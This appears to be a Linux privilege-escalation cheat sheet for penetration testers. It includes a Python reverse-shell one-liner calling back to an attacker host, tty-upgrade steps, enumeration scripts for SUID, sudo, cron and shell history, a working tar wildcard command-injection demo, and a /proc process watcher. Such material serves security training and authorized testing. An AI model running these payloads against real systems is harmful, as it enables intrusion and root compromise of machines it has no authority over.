Linux Privilege Escalation
Get tty (text terminal)
Create another netcat listener (e.g. nc -lvnp 4242 on the Kali box) and send yourself a reverse shell from the target:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Kali IP>",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

However this shell still won't do what we want (no job control, no tab completion, and CTRL+C kills the connection instead of the running command), so we need a full tty for an interactive shell:

python -c 'import pty; pty.spawn("/bin/bash")'
or
python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm // gives us access to terminal commands such as clear.

Optional, if the pty spawn above does not get the job done: press CTRL+Z to put the shell in the background. Next, type this command in the same window:

stty raw -echo; fg

This will bring your shell back to the foreground with a fully interactive experience (run reset afterwards if the terminal looks garbled).
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys
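Added helper, not from the original page or the ropnop post: a small POSIX sh snippet that picks whichever pty spawner exists on the target (python3, python, or the util-linux script binary as a fallback the ropnop post also mentions) and tells you whether you even need one. The function names are my own; nothing here is a real tool's CLI.

```shell
#!/bin/sh
# pick_pty_spawner: print the command that gives a pty on this host.
# Tries python3, then python, then util-linux "script". Prints the command
# and returns 0, or prints nothing and returns 1 when no spawner exists.
pick_pty_spawner() {
  if command -v python3 >/dev/null 2>&1; then
    echo "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
  elif command -v python >/dev/null 2>&1; then
    echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'"
  elif command -v script >/dev/null 2>&1; then
    # util-linux syntax; BSD "script" takes different arguments
    echo "script -qc /bin/bash /dev/null"
  else
    return 1
  fi
}

# have_tty: 0 when stdin is already a terminal (nothing to upgrade), 1 otherwise.
have_tty() {
  [ -t 0 ]
}

# upgrade_shell: run from inside the dumb reverse shell. After it spawns the
# pty, finish the upgrade from the attacker side: CTRL+Z, "stty raw -echo; fg",
# then "export TERM=xterm" in the upgraded shell.
upgrade_shell() {
  if have_tty; then
    echo "stdin is already a tty, nothing to do"
    return 0
  fi
  cmd=$(pick_pty_spawner) || { echo "no pty spawner found on this host" >&2; return 1; }
  echo "spawning pty with: $cmd"
  eval "$cmd"
}
```

Paste the functions into the dumb shell and call upgrade_shell; it is deliberately not run at the bottom of the file so that sourcing it does nothing by itself.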
Gather info and look around
history                          what the user typed before (passwords, paths, hosts); also check users (/etc/passwd), architecture (uname -a) and running services (ps aux, netstat -tulpn)
su user                          log in as another user
sudo -l                          check which commands the current user may run as root
cat /etc/crontab, crontab -l     cron is your friend: look for root jobs that run scripts you can write to
ls -l /bin/bash                  if bash is SUID, /bin/bash -p is an easy win
sudo -u user command             run a command as another user
https://www.cyberciti.biz/open-source/command-line-hacks/linux-run-command-as-different-user/
https://www.oreilly.com/library/view/linux-security-cookbook/0596003919/ch05s03.html
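Added example, not part of the original cheat sheet: the manual checks from the list above wrapped into a few sh functions, so the SUID, cron and sudo checks can be rerun in one go and their output kept. The function names and the set of cron paths it looks at are my own choices; the crontab field layout assumed is the system one (minute hour dom month dow user command), which is what /etc/crontab and /etc/cron.d use.

```shell
#!/bin/sh
# find_suid DIR: regular files under DIR with the setuid bit set, staying on one
# filesystem. Check the owner afterwards: only root-owned ones are a root path.
find_suid() {
  find "$1" -xdev -type f -perm -4000 2>/dev/null || true
}

# writable_cron: cron configuration the current user can write to directly.
writable_cron() {
  for f in /etc/crontab /etc/cron.d /etc/cron.hourly /etc/cron.daily \
           /etc/cron.weekly /var/spool/cron/crontabs; do
    if [ -w "$f" ]; then echo "$f"; fi
  done
}

# writable_cron_targets: read system-crontab lines on stdin
# (m h dom mon dow user command ...) and print every command whose
# executable the current user can write to. Skips comments, blank lines and
# VAR=value lines such as SHELL=/bin/sh.
writable_cron_targets() {
  awk '!/^[[:space:]]*(#|$)/ && !/^[A-Za-z_][A-Za-z0-9_]*=/ {print $7}' \
  | while IFS= read -r cmd; do
      if [ -n "$cmd" ] && [ -w "$cmd" ]; then echo "$cmd"; fi
    done
}

# bash_is_suid: when /bin/bash is setuid root, "/bin/bash -p" keeps euid 0.
bash_is_suid() {
  [ -u /bin/bash ]
}

# quick_enum: the list above in one pass; pipe it into tee to keep a log.
quick_enum() {
  echo "== id"; id
  echo "== sudo -l (passwordless entries only, -n never prompts)"
  sudo -n -l 2>/dev/null || echo "(nothing without a password, or no sudo)"
  echo "== setuid bash"
  if bash_is_suid; then echo "/bin/bash is SUID: try /bin/bash -p"; fi
  echo "== setuid binaries"; find_suid /
  echo "== writable cron config"; writable_cron
  echo "== writable cron targets"
  cat /etc/crontab /etc/cron.d/* 2>/dev/null | writable_cron_targets
  echo "== shell history (last 20 lines)"
  cat "$HOME"/.*history 2>/dev/null | tail -n 20
}
```

Run quick_enum | tee enum.txt on the target; find_suid and writable_cron_targets are separate so they can be pointed at a single directory or at a crontab you copied off the box.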
Exploiting SUID executables (bash, binaries)
Exploit tar wildcards
https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/
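Added worked example, not from the original page or the linked article: it reproduces the tar wildcard trick from that article in a scratch directory, with the vulnerable cron job beside the fixed one. The cron job it imitates ("cd some-dir && tar cf backup.tar *"), the scratch paths and the function names are assumptions for the demo; the two file names and the checkpoint options are the real GNU tar behaviour the trick relies on.

```shell
#!/bin/sh
# gnu_tar_available: --checkpoint-action only exists in GNU tar, so the trick
# does not apply to busybox or BSD tar.
gnu_tar_available() {
  tar --version 2>/dev/null | grep -q 'GNU tar'
}

# demo_tar_wildcard MODE: imitate a root cron job "cd DIR && tar cf backup.tar *"
# in a temporary DIR that a low-privileged user can write to.
#   vuln  runs the job as written; "*" expands to file names that tar parses as
#         options, so the planted shell.sh runs at the first checkpoint.
#   safe  runs the same job with "--" so nothing after it is read as an option.
# Returns 0 if the planted command ran, 1 if it did not.
demo_tar_wildcard() {
  mode=${1:-vuln}
  dir=$(mktemp -d)
  # what the attacker drops into the archived directory
  printf 'touch "%s/pwned"\n' "$dir" > "$dir/shell.sh"
  touch "$dir/--checkpoint=1"
  touch "$dir/--checkpoint-action=exec=sh shell.sh"
  echo 'ordinary content' > "$dir/notes.txt"
  # the cron job (errors silenced: tar's exit status is not what we measure)
  if [ "$mode" = safe ]; then
    ( cd "$dir" && tar cf backup.tar -- * ) >/dev/null 2>&1 || :
  else
    ( cd "$dir" && tar cf backup.tar * ) >/dev/null 2>&1 || :
  fi
  if [ -e "$dir/pwned" ]; then
    rm -rf "$dir"
    return 0
  fi
  rm -rf "$dir"
  return 1
}
```

In a real engagement shell.sh would add your key, copy a SUID bash, or run a reverse shell; the fix on the defending side is the "--" (or naming the directory, "tar cf backup.tar ./" instead of "*") and, more generally, never letting unprivileged users write into directories a root cron job globs.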
Automated tools and observation
./linpeas.sh | tee linlog.txt   (keep the log, it is long)
pspy                            watch processes and cron jobs fire without needing root
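Added example, not from the original page and not pspy's own code: a poor man's pspy in POSIX sh for boxes where you cannot drop a binary. It does what pspy does at heart, polling /proc and printing every process that was not there a moment ago, which is enough to catch a cron job and the user it runs as. It assumes a mounted /proc with readable cmdline and status files; the function names are mine.

```shell
#!/bin/sh
# snapshot_procs: one "pid uid cmdline" line per process visible in /proc,
# read straight from the kernel so it works without ps.
snapshot_procs() {
  for p in /proc/[0-9]*; do
    [ -r "$p/cmdline" ] || continue
    cmd=$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null) || continue
    [ -n "$cmd" ] || continue          # kernel threads have an empty cmdline
    uid=$(awk '/^Uid:/ {print $2}' "$p/status" 2>/dev/null)
    printf '%s %s %s\n' "${p#/proc/}" "${uid:-?}" "$cmd"
  done | sort -n
}

# new_procs BEFORE AFTER: lines in snapshot file AFTER that are not in BEFORE.
new_procs() {
  grep -v -x -F -f "$1" "$2" || true
}

# watch_procs SECONDS [INTERVAL]: poll /proc for SECONDS and print each process
# that appears, prefixed with NEW:. Run it across a minute boundary to see
# cron children; uid 0 lines running something you can write to are the win.
watch_procs() {
  secs=${1:-60}; interval=${2:-1}
  prev=$(mktemp); cur=$(mktemp)
  snapshot_procs > "$prev"
  end=$(( $(date +%s) + secs ))
  while [ "$(date +%s)" -lt "$end" ]; do
    sleep "$interval"
    snapshot_procs > "$cur"
    new_procs "$prev" "$cur" | sed 's/^/NEW: /'
    cp "$cur" "$prev"
  done
  rm -f "$prev" "$cur"
}
```

Short-lived jobs can still slip between two polls; pspy avoids that with inotify on the filesystem, which is why it is the better tool when you can get it onto the box.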
Other Dirty Tricks
Expand knowledge and cheatsheet